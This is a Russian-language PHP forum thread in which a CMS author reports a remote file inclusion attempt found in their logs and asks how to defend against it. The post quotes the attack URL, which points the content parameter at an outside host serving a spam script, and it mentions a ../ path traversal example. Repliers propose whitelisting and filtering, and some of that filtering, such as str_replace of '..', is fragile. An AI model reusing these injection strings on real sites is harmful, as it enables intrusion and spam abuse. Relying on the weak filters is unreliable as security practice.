Форум PHP

Дело в том что в cms которой я пользуюсь в статьи хранятся впапке contents
и при сапросе вида site.ru/index.php?content=file
из папки content/file/index.php загружается статья.
Сейчас просмотрел логи и видел странное продолжение site.ru/index.php?content=http://xoomer.alice.it/lupalupa/a.txt?

Посмотрите данный эксплоид , увидите там скрипт -спамер.
Как можно защититься от такого?

Можно, конечно. Сменить cms.

Почему вообще в переменную $conten попадает что попало, и попадало-ли?
проверяйте на только цифры или буквы, и если дальше include() , вообще желательно применять проверку существования файла, можно исправить на readfile(), если там нечего интерпритировать.
Хотя наличие в логах не обязательно означает что это работало в вышеозначенной cms

Поможет смена CMS.

>Поможет смена CMS.
Я пишу свою cms
Ну как вданный момент можно защититься от этого эксплоита. Уже 15 тыс. писем пришло на почту.

<? $_GET['content'] = str_replace(array("..", "../", "/../", "/.."), "", $_GET['content']); // соответственно в именах реальных файлов и папок не должно быть ".." if ( !is_dir($_GET['content']) ) exit("DIE!!!");

Ещё не мешает защититься от такого "site.ru/index.php?content=../../../".

После удаления ".." в тексте не останется подстрок "../", "/../", "/..".

Тогда array("/../", "../", "/..", "..");

Нужно проверять содержимое $_GET['content'] на принадлежность множеству имеющихся у Вас страниц. Перед тем, как использовать .

Тоесть имеешь ввиду проверять имеется ли такое название папки в каталоге content?

>Я пишу свою cms
>Ну как вданный момент можно защититься от этого эксплоита. Уже 15 тыс. писем пришло на почту.
странно... как же вы пишете свою cms, если не знаете как защититься от простейшей уязвимости?

забудьте про файлики. попробуйте http://ru.wikipedia.org/wiki/SQL

Странная CMS, контент на файлах? Раньше возможно и использовалась, или автор не знал, что такое БД.

Да на файлах.

-